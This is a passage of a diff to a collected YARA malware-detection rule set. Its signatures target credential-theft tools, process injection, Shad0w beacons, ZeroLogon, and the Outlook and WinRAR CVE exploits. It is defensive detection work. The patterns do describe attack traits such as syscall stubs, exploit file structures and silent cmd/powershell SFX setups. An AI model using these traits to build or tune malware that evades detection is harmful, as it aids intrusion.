+		$KVASCODE = {4B 56 41 53 43 4F 44 45}
+		$CKL = "Circular Kernel Context Logger" wide nocase
 
 	condition:
-		#go> 10 and pe.exports ( "RunSliver" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SBOUSSEADEN_Hunt_Common_Credit_Card_Memscrapper : FILE
+rule SBOUSSEADEN_Hunt_Procinj_Instrumentationcallback : FILE
 {
 	meta:
-		description = "Hunting rule for possible CC data memory scrapper"
+		description = "hunt for possible injection with Instrumentation Callback PE"
 		author = "SBousseaden"
-		id = "f342535f-2236-5da0-8a4d-d7fecb7737b8"
-		date = "2020-07-17"
-		modified = "2020-07-18"
-		reference = "https://github.com/sbousseaden/YaraHunts/"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_creditcard_memscrap.yara#L1-L28"
+		id = "f450bf71-d848-540e-b700-c046662f1cbc"
+		date = "2020-07-25"
+		modified = "2020-07-25"
+		reference = "https://movaxbx.ru/2020/07/24/weaponizing-mapping-injection-with-instrumentation-callback-for-stealthier-process-injection/"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_procinj_instrcallback.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "983cc0c93dd19b32f729540dcc691b3a01ead8ed916e3ef5259456f5e25bd009"
+		logic_hash = "b33dae550bae9508b9fd5b2d6cabf1d4d928792d3988af23cdba34d9d3d03162"
 		score = 50
-		quality = 75
+		quality = 71
 		tags = "FILE"
 
 	strings:
-		$api1 = "NtOpenProcess"
-		$api2 = "NtQueryVirtualMemory"
-		$api3 = "NtReadVirtualMemory"
-		$cc1 = "^3[47][0-9]{13}$"
-		$cc2 = "^(6541|6556)[0-9]{12}$"
-		$cc3 = "^389[0-9]{11}$"
-		$cc4 = "^3(?:0[0-5]|[68][0-9])[0-9]{11}$"
-		$cc5 = "^65[4-9][0-9]{13}|64[4-9][0-9]{13}|6011[0-9]{12}|(622(?:12[6-9]|1[3-9][0-9]|[2-8][0-9][0-9]|9[01][0-9]|92[0-5])[0-9]{10})$"
-		$cc6 = "^63[7-9][0-9]{13}$"
-		$cc7 = "^(?:2131|1800|35\\d{3})\\d{11}$"
-		$cc8 = "^9[0-9]{15}$"
-		$cc9 = "^(6304|6706|6709|6771)[0-9]{12,15}$"
-		$cc10 = "^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$"
-		$cc11 = "^(5[1-5][0-9]{14}|2(22[1-9][0-9]{12}|2[3-9][0-9]{13}|[3-6][0-9]{14}|7[0-1][0-9]{13}|720[0-9]{12}))$"
-		$cc12 = "^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$"
-		$cc13 = "^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$"
-		$cc14 = "^(62[0-9]{14,17})$"
-		$cc15 = "^4[0-9]{12}(?:[0-9]{3})?$"
-		$cc16 = "^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$"
+		$mv1 = "MapViewOfFile3" xor
+		$mv2 = "MapViewOfFile3" wide xor
+		$mv3 = "NtMapViewOfSectionEx" xor
+		$mv4 = "NtMapViewOfSectionEx" wide xor
+		$mv5 = {(49 89 CA|4C 8B D1) B8 0F 01 00 00 0F 05 C3}
+		$spi1 = "NtSetInformationProcess" xor
+		$spi2 = "NtSetInformationProcess" wide xor
+		$spi3 = {(49 89 CA|4C 8B D1) B8 1C 00 00 00 0F 05 C3}
+		$picb = {BA 28 00 00 00}
+		$ss1 = {41 52 50 53 55 57 56 54 41 54 41 55 41 56 41 57}
+		$ss2 = {41 5F 41 5E 41 5D 41 5C 5C 5E 5F 5D 5B 58 41 5A}
+		$ss3 = {49 89 CA 0F 05 C3}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $cc* ) and all of ( $api* )
+		uint16( 0 ) == 0x5a4d and $picb and 1 of ( $mv* ) and 1 of ( $spi* ) and 1 of ( $ss* )
 }
-
-rule SBOUSSEADEN_Hunt_Dllhijack_Wow64Log : FILE
+rule SBOUSSEADEN_Shad0W_Beacon_16June : FILE
 {
 	meta:
-		description = "broad hunt for non MS wow64log module"
+		description = "Shad0w beacon compressed"
 		author = "SBousseaden"
-		id = "1d01917f-0690-5ede-947a-90fc86c03c38"
-		date = "2020-06-05"
-		modified = "2020-06-05"
-		reference = "http://waleedassar.blogspot.com/2013/01/wow64logdll.html"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/wow64log.yara#L3-L13"
+		id = "1229e84f-bf6e-5e87-9351-a48cd50397b0"
+		date = "2020-06-16"
+		modified = "2020-06-17"
+		reference = "https://github.com/bats3c/shad0w"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w_beacon_16June.yara#L1-L13"
 		license_url = "N/A"
-		logic_hash = "e8ec491fe579b7e57b7e9078515a9628cfc2e0f3645882b9a352ff28a2fcb817"
-		score = 50
+		logic_hash = "c313e995d6eaae6d2ee63964f6fc94964065af7a61d7f304280d914e6f0dd548"
+		score = 75
 		quality = 75
 		tags = "FILE"
 
+	strings:
+		$s1 = {F2 AE ?? ?? ?? FF 15 ?? ?? 00 00 48 09 C0 74 09}
+		$s2 = {33 2E 39 36 00 ?? ?? ?? 21 0D 24 0E 0A}
+		$s3 = "VirtualProtect"
+		$s4 = "GetProcAddress"
+
 	condition:
-		uint16( 0 ) == 0x5a4d and ( pe.exports ( "Wow64LogInitialize" ) or pe.exports ( "Wow64LogMessageArgList" ) or pe.exports ( "Wow64LogSystemService" ) or pe.exports ( "Wow64LogTerminate" ) )
+		uint16( 0 ) == 0x5a4d and all of ( $s* )
 }
-
-rule SBOUSSEADEN_Susp_Winsvc_Upx : FILE
+rule SBOUSSEADEN_Zerlologon_Mimikatz : FILE
 {
 	meta:
-		description = "broad hunt for any PE exporting ServiceMain API and upx packed"
+		description = "Generic Hunting rule for Mimikatz Implementation of ZeroLogon PrivEsc Exploit"
 		author = "SBousseaden"
-		id = "883691fe-3858-5177-97ca-122ff2ec54af"
-		date = "2019-01-28"
-		modified = "2020-06-05"
-		reference = "https://github.com/sbousseaden/YaraHunts/"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/susp_winsvc_upx.yara#L3-L13"
+		id = "0fd32f14-d82d-5af4-b4a2-b21e2325ade8"
+		date = "2020-09-17"
+		modified = "2020-09-17"
+		reference = "https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_mimikatz_zerologon.yar#L1-L19"
 		license_url = "N/A"
-		logic_hash = "85b1932eaab4e559f0805aa76ad9b58553708391b3ac894a8e4f1cf34470dcb7"
-		score = 65
+		logic_hash = "5b8d618e8e680acd4e5a9def4e3b56617080dec0c5787c3d6f948489346a6888"
+		score = 50
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$upx1 = {55505830000000}
-		$upx2 = {55505831000000}
-		$upx_sig = "UPX!"
+		$rch1 = "NetrServerReqChallenge"
+		$rch2 = "NetrServerReqChallenge" wide
+		$auth1 = "NetrServerAuthenticate2"
+		$auth2 = "NetrServerAuthenticate2" wide
+		$pwd1 = "NetrServerPasswordSet2"
+		$pwd2 = "NetrServerPasswordSet2" wide
+		$rpc1 = {78 56 34 12 34 12 CD AB EF 00 01 23 45 67 CF FB}
+		$rpc2 = {00 00 12 08 25 5C 11 08 25 5C 11 00 08 00 1D 00 08 00 02 5B 15 00 08 00 4C 00 F4 FF 5C 5B 11 04 F4 FF 11 08 08 5C 11 00 02 00 15 03 0C 00 4C 00 E4 FF 08 5B 11 04 F4 FF 11 00 08 00 1D 01 00 02 05 5B 15 03 04 02 4C 00 F4 FF 08 5B 11 04 0C 00 1D 00 10 00 4C 00 BE FF 5C 5B 15 00 10 00 4C 00 F0 FF 5C 5B 00}
+		$rpc3 = {00 48 00 00 00 00 04 00 28 00 31 08 00 00 00 5C 3C 00 44 00 46 05 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 0A 01 10 00 14 00 12 21 18 00 14 00 70 00 20 00 08 00 00 48 00 00 00 00 0F 00 40 00 31 08 00 00 00 5C 5E 00 60 00 46 08 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 48 00 10 00 0D 00 0B 01 18 00 08 00 0A 01 20 00 14 00 12 21 28 00 14 00 58 01 30 00 08 00 70 00 38 00 08 00 00 48 00 00 00 00 1E 00 40 00 31 08 00 00 00 5C 8E 02 58 00 46 08 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 48 00 10 00 0D 00 0B 01 18 00 08 00 0A 01 20 00 2A 00 12 41 28 00 2A 00 0A 01 30 00 42 00 70 00 38 00 08 00 00 48 00 00 00 00 2A 00 48 00 31 08 00 00 00 5C 56 00 40 01 46 09 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 48 00 10 00 0D 00 0B 01 18 00 08 00 0A 01 20 00 2A 00 12 41 28 00 2A 00 12 41 30 00 5A 00 12 41 38 00 5A 00 70 00 40 00 08 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $upx1 in ( 0 .. 1024 ) and $upx2 in ( 0 .. 1024 ) and $upx_sig in ( 0 .. 1024 ) and pe.exports ( "ServiceMain" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $rch* ) and 1 of ( $auth* ) and 1 of ( $pwd* ) ) and 2 of ( $rpc* )
 }
-rule SBOUSSEADEN_Mimikatz_Kiwikey
-{
-	meta:
-		description = "hunt for default mimikatz kiwikey"
-		author = "SBousseaden"
-		id = "3141e679-6e07-5017-9675-4557fb876ebc"
-		date = "2020-08-08"
-		modified = "2020-08-09"
-		reference = "https://github.com/sbousseaden/YaraHunts/"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/kiwikey.yara#L1-L10"
-		license_url = "N/A"
-		logic_hash = "03745aed838dafad2fc6e190f181141bda31c212af56edb8ba665b86671f8bee"
-		score = 75
-		quality = 75
-		tags = ""
+/*
+ * YARA Rule Set
+ * Repository Name: Elceef
+ * Repository: https://github.com/elceef/yara-rulz
+ * Retrieval Date: 2025-06-15
+ * Git Commit: 05834717d1464d5efce8ad9d688ff7b53886a0bb
+ * Number of Rules: 18
+ * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
+ *
+ *
+ * LICENSE
+ *
+ * MIT License
 
-	strings:
-		$A = {60 BA 4F CA C7 44 24 ?? DC 46 6C 7A C7 44 24 ?? 03 3C 17 81 C7 44 24 ?? 94 C0 3D F6}
-		$B = {48 B8 ?? ?? ?? ?? ?? ?? ?? ?? FF D0}
+Copyright (c) 2022 Marcin Ulikowski
 
-	condition:
-		$A and #B > 10
-}
-rule SBOUSSEADEN_Hunt_Slub_Backdoor : FILE
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
+
+ */
+rule ELCEEF_Suspicious_SFX : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SBousseaden"
-		author = "SBousseaden"
-		id = "c15d5f14-d17f-528b-bf85-e06a5e23518c"
-		date = "2020-10-22"
-		modified = "2020-10-22"
-		reference = "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/APT_SLUB_Backdoor.yara#L1-L22"
-		license_url = "N/A"
-		hash = "93bb93d87cedb0a99976c18a37d65f816dc904942a0fb39cc177d49372ed54e5"
-		hash = "59e4510b7b15011d67eb2f80484589f7211e67756906a87ce466a7bb68f2095b"
-		hash = "c7788c015244e12e4c8cc69a2b1344d589284c84102c2f1871bbb4f4c32c2936"
-		hash = "6678a5964db74d477b39bd0a8c18adf02844bed8b112c7bcca6984032918bdfb"
-		logic_hash = "aa17dcfde1e2227ff04bda708d4c40c1e1f07b404d2c43582632d83c98d65e83"
-		score = 50
+		description = "Detects self-extracting archives (SFX) executing cmd.exe or powershell.exe"
+		author = "marcin@ulikowski.pl"
+		id = "78f4ae8b-ba17-5c02-a6f0-66bec873aba8"
+		date = "2023-04-04"
+		modified = "2023-04-04"
+		reference = "https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/"
+		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Suspicious_SFX.yara#L1-L22"
+		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
+		logic_hash = "688ed356e2fa936a0e07a8479591c28fb457053ed94351bad4bf367b02f04b0a"
+		score = 65
 		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "file_infos" ascii wide
-		$s2 = "%ws\\%u_cmd_out.tmp" ascii wide
-		$s3 = "%ws\\%u_cmd_out.zip" ascii wide
-		$s4 = "[was netstat]" ascii wide
-		$s5 = {63 3A 5C 77 6F 72 6B 2E 76 63 70 6B 67 5C 69 6E 73 74 61 6C 6C 65 64 5C 78 36 34 2D 77 69 6E 64 6F 77 73 2D 73 74 61 74 69 63 5C}
-		$s6 = "LoadFileToMemory" ascii wide
-		$s7 = "setStartupExec" ascii wide
-		$s8 = "%04u-%02u-%02u %02u:%02u:%02u" ascii wide
-		$s9 = "goto del_one" ascii wide
-		$s10 = "goto del_two" ascii wide
+		$rar = { 52 61 72 21 }
+		$zip = { 50 4b 03 04 }
+		$setup_cmd = "\nSetup=cmd"
+		$setup_powershell = "\nSetup=powershell"
+		$silent = "\nSilent=1"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		filesize < 1MB and uint16be( 0 ) == 0x4d5a and any of ( $zip , $rar ) and any of ( $setup_* ) and $silent
 }
-rule SBOUSSEADEN_Shad0W_Ldrloaddll_Hook : FILE
+rule ELCEEF_OLE2_Autoopen_Reversed_Payload : FILE
 {
 	meta:
-		description = "Shad0w beacon LdrLoadDll hook"
-		author = "SBousseaden"
-		id = "f9f75b96-2341-553f-b6ca-28d6cb9b880a"
-		date = "2020-06-06"
-		modified = "2020-06-07"
-		reference = "https://github.com/bats3c/shad0w"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w_ldrhook.yara#L1-L13"
-		license_url = "N/A"
-		logic_hash = "28e8ca9eee2377fd816dd3bd29e05f4146cea975e0ba5ec180073e10a49895e0"
-		score = 75
-		quality = 75
+		description = "Detects suspiciously reversed payloads in OLE2 objects with auto-open macros"
+		author = "marcin@ulikowski.pl"
+		id = "9244fdb7-9949-58a0-9e39-e61e04cc1574"
+		date = "2021-12-01"
+		modified = "2023-04-04"
+		reference = "https://github.com/elceef/yara-rulz"
+		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/OLE2_Reversed.yara#L1-L20"
+		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
+		logic_hash = "425750e77d31ddc356f803ee6e2f192f93f64534a9633fef02da5caaa60dbcaf"
+		score = 65
+		quality = 42
 		tags = "FILE"
 
 	strings:
-		$s1 = "LdrLoadD"
-		$s2 = "SetPr"
-		$s3 = "Policy"
-		$s4 = {B8 49 BB DE AD C0}
+		$auto_open = /(auto|document|workbook)_?(open|close)/ wide ascii nocase
+		$http = /\/\/:s?ptth/ wide ascii
+		$programdata = /\\ataDmargorP\\\\?:C/ wide ascii nocase
+		$windows = /\\swodniW\\\\?:C/ wide ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* )
+		filesize < 1MB and uint32be( 0 ) == 0xd0cf11e0 and $auto_open and any of ( $http , $programdata , $windows )
 }
-rule SBOUSSEADEN_Hunt_Susp_Vhd : FILE
+rule ELCEEF_ZIP_High_Ratio_Single_Doc : FILE
 {
 	meta:
-		description = "Virtual hard disk file with embedded PE"
-		author = "SBousseaden"
-		id = "14b082b2-c5cd-5f34-85e9-5987650eaacd"
-		date = "2020-07-13"
-		modified = "2020-07-13"
-		reference = "https://github.com/sbousseaden/YaraHunts/"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_susp_vhd.yara#L1-L12"
-		license_url = "N/A"
-		logic_hash = "4ba2e3f533942b27c1d235be4677afdac774b558429c414043a8e3a609123ad3"
-		score = 65
-		quality = 73
+		description = "Detects ZIP archives containing single MS Word document with unusually high compression ratio"
+		author = "marcin@ulikowski.pl"
+		id = "0fbe89d9-1bf5-50a9-b6c1-1d739162a2ba"
+		date = "2023-03-08"
+		modified = "2023-03-08"
+		reference = "https://github.com/elceef/yara-rulz"
+		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/ZIP_High_Ratio_Single_Doc.yara#L8-L27"
+		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
+		logic_hash = "470300b8d6356cff43a1e2be3a23a97be5d1e2ce5a76f2fb2eccdbbb47a4d327"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		hash1 = "4d9a6dfca804989d40eeca9bb2d90ef33f3980eb07ca89bbba06d0ef4b37634b"
+		hash2 = "4bc2d14585c197ad3aa5836b3f7d9d784d7afe79856e0ddf850fc3c676b6ecb1"
 
 	strings:
-		$hvhd = {636F6E6563746978}
-		$s1 = {4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00}
-		$s2 = "!This program cannot be run in DOS mode." base64
-		$s3 = "!This program cannot be run in DOS mode." xor
+		$magic = { 50 4b 03 04 }
+		$ext = ".doc"
 
 	condition:
-		$hvhd at 0 and any of ( $s* ) and filesize <= 10MB
+		filesize < 1MB and $magic at 0 and #magic == 1 and uint32( 22 ) > 1024 * 1024 * 100 and $ext at ( uint16( 26 ) + 26 )
 }
-rule SBOUSSEADEN_TDL_Loader_Bootstrap_Shellcode : FILE
+rule ELCEEF_HTML_Windows_Search_Abuse
 {
 	meta:
-		description = "No description has been set in the source file - SBousseaden"
-		author = "SBousseaden"
-		id = "a2adedef-ba38-599f-b52c-e2156aa5ef98"
-		date = "2020-10-10"
-		modified = "2020-10-10"
-		reference = "https://github.com/hfiref0x/TDL"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/tdl_loader_bootstrat_shellcode.yara#L1-L9"
-		license_url = "N/A"
-		logic_hash = "14a993b415e330e284503c409ab66445c5e369a21ef0be37297d9c8946b5559b"
+		description = "Detects HTML files abusing Windows system functionalities to redirect and download malicious payloads"
+		author = "marcin@ulikowski.pl"
+		id = "537cb46e-4cfc-517c-8d6d-0019f2c3e5ef"
+		date = "2024-06-15"
+		modified = "2024-06-16"
+		reference = "https://github.com/elceef/yara-rulz"
+		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/HTML_Windows_Search.yara#L1-L22"
+		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
+		logic_hash = "6a0d490cf08ab0aad3c535645abe9ebc26d12768cf2a2e932cdb7ec93cf3e2bd"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
+		hash1 = "d136dcfc355885c502ff2c3be229791538541b748b6c07df3ced95f9a7eb2f30"
 
 	strings:
-		$shc1 = {41 B8 54 64 6C 53 48 63 6B 3C 48 03 EB 44 8B 7D 50 41 8D 97 00 10 00 00 41 FF D1}
-		$shc2 = {41 B8 54 64 6C 53 4C 63 73 3C 4C 03 F3 45 8B 7E 50 41 8D 97 00 10 00 00 41 FF D1 45 33 C9}
+		$location1 = "location.href" wide ascii
+		$location2 = "location.replace(" wide ascii
+		$location3 = "location.assign(" wide ascii
+		$metarefresh = "<meta http-equiv=\"refresh\"" nocase wide ascii
+		$search1 = "\"search-ms:query=" wide ascii
+		$search2 = "\"search:query=" wide ascii
+		$search3 = "URL=search:query=" wide ascii
+		$crumb1 = "&crumb=location:" wide ascii
+		$crumb2 = "&amp;crumb=location:" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of ( $shc* )
+		( any of ( $location* ) or $metarefresh ) and any of ( $search* ) and any of ( $crumb* )
 }
-
-rule SBOUSSEADEN_Shad0W_Beacon : FILE
+rule ELCEEF_Outlook_CVE_2023_23397_Exploit : FILE
 {
 	meta:
-		description = "Shad0w beacon default suspicous strings"
-		author = "SBousseaden"
-		id = "e725172d-dd07-5027-ac85-86d366881856"
-		date = "2020-06-04"
-		modified = "2020-06-05"
-		reference = "https://github.com/bats3c/shad0w"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w.yara#L3-L15"
-		license_url = "N/A"
-		logic_hash = "9ea7cf72da0d93f607f58b61cc0fb5f3f114d4454101c69b08c59e6b61353550"
+		description = "Detects Outlook meeting/appointment/task files with ReminderSoundFile property set to UNC path"
+		author = "marcin@ulikowski.pl"
+		id = "f0dfb7a6-b3bf-58c4-a9a2-978f436679d9"
+		date = "2023-03-16"
+		modified = "2023-04-20"
+		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
+		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Outlook_CVE_2023_23397.yara#L1-L29"
+		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
+		logic_hash = "695721ec276415c6a6a0f4ce6378ff2d11c15d28271f587966bc3d9d8c06f63a"
 		score = 75
-		quality = 73
+		quality = 50
 		tags = "FILE"
+		hash1 = "52dbaf64ce1a5cd1db9a9d385f8204e5f665ca53a3d904033bf1a10369490646"
+		hash2 = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
+		hash3 = "078b5023cae7bd784a84ec4ee8df305ee7825025265bf2ddc1f5238c3e432f5f"
+		hash4 = "1867bc9f81e99a55103288ce10c5c05267119ebb13757686e59bfed156f62b51"
 
 	strings:
-		$s1 = "LdrLoadD"
-		$s2 = {53 65 74 50 72 2A 65 73 73 4D}
-		$s3 = "Policy"
+		$pid_reminder_file = { 1f 85 00 00 0? 00 ?? 00 }
+		$pid_reminder_override = { 1c 85 00 00 0? 00 ?? 00 }
+		$psetid_common = { 08 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
+		$psetid_appointment = { 02 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
+		$psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
+		$unc = /\\\\([a-z1-9][a-z0-9.]{6}|\.\\UNC\\\\)/ wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) and pe.sections [ 0 ] . name == "XPU0" and pe.imports ( "winhttp.dll" , "WinHttpOpen" )
+		filesize < 1MB and ( uint32be( 0 ) == 0xd0cf11e0 or uint32be( 0 ) == 0x789f3e22 ) and ( $psetid_appointment or $psetid_task ) and $psetid_common and ( $pid_reminder_file and $pid_reminder_override ) and $unc
 }
-/*
- * YARA Rule Set
- * Repository Name: Elceef
- * Repository: https://github.com/elceef/yara-rulz
- * Retrieval Date: 2025-06-08
- * Git Commit: 05834717d1464d5efce8ad9d688ff7b53886a0bb
- * Number of Rules: 18
- * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
- *
- *
- * LICENSE
- *
- * MIT License
-
-Copyright (c) 2022 Marcin Ulikowski
-
-Permission is hereby granted, free of charge, to any person obtaining a copy
-of this software and associated documentation files (the "Software"), to deal
-in the Software without restriction, including without limitation the rights
-to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-copies of the Software, and to permit persons to whom the Software is
-furnished to do so, subject to the following conditions:
-
-The above copyright notice and this permission notice shall be included in all
-copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-SOFTWARE.
-
- */
 rule ELCEEF_Suspicious_Onenote
 {
 	meta:
@@ -165959,55 +166687,29 @@ rule ELCEEF_Suspicious_Onenote
 	condition:
 		$magic at 8 and 1 of ( $fdso_* )
 }
-rule ELCEEF_HTA_Wscriptshell_Onenote : FILE
-{
-	meta:
-		description = "Detects suspicious OneNote documents with embedded HTA + WScript.Shell"
-		author = "marcin@ulikowski.pl"
-		id = "8cebd862-8dfb-5f5d-befb-5c41cde945ff"
-		date = "2023-02-01"
-		modified = "2023-02-02"
-		reference = "https://github.com/elceef/yara-rulz"
-		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/HTA_OneNote.yara#L1-L17"
-		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
-		logic_hash = "0287ac5d618c9a8332d167f1a05157aa829c7e8a052c35100fcaeb644d452e5c"
-		score = 65
-		quality = 75
-		tags = "FILE"
-		hash1 = "002fe00bc429877ee2a786a1d40b80250fd66e341729c5718fc66f759387c88c"
-
-	strings:
-		$magic = { ae b1 53 78 d0 29 96 d3 }
-		$hta = { 00 04 00 00 00 2e 00 68 00 74 00 61 }
-		$wsh = "CreateObject(\"WScript.Shell\")"
-
-	condition:
-		filesize < 5MB and $magic at 8 and $wsh and $hta
-}
-rule ELCEEF_Obfuscated_IP_Address_In_URL
+rule ELCEEF_Winrar_CVE_2023_38831_Exploit : CVE_2023_38831 FILE
 {
 	meta:
-		description = "Detects hexadecimal and octal IP address representations in URL"
+		description = "Detects ZIP archives exploiting CVE-2023-38831 in WinRAR"
 		author = "marcin@ulikowski.pl"
-		id = "f2ebf5f7-5446-5eaa-8e30-90d08b8616d9"
-		date = "2020-09-17"
-		modified = "2024-03-04"
-		reference = "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam/"
-		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Obfuscated_IPAddr_URL.yara#L1-L17"
+		id = "7d592eb7-b344-59ed-adf8-fe69ebb1e43f"
+		date = "2023-09-23"
+		modified = "2023-09-28"
+		reference = "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day"
+		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/WinRAR_CVE_2023_38831.yara#L1-L17"
 		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
-		logic_hash = "ab2a2a3a56e6eed9f4a3a8f994c89a167f00b86ce442820c81d8ee673b0ab85c"
+		logic_hash = "06f1d807429fb175831cf333b05b44b6ce33b4ae981e16c03e36ec7564a4fdd1"
 		score = 75
-		quality = 40
-		tags = ""
+		quality = 75
+		tags = "CVE-2023-38831, FILE"
+		hash1 = "00175d538cba0c493e397a0b7f4b28f9a90dd0ee40f69795ae28d23ce0d826c0"
+		hash2 = "ca8ca67df7853b86b6a107c8fd7f73b757de9143ea8844d0e6209249e8377885"
 
 	strings:
-		$ = /="?http:\/\/0[0-7]{1,3}\.0[0-7]{1,3}\.0[0-7]{1,3}\.0[0-7]{1,3}\.?\// nocase ascii wide
-		$ = /="?http:\/\/0x[0-9a-f]{8}\.?\// nocase ascii wide
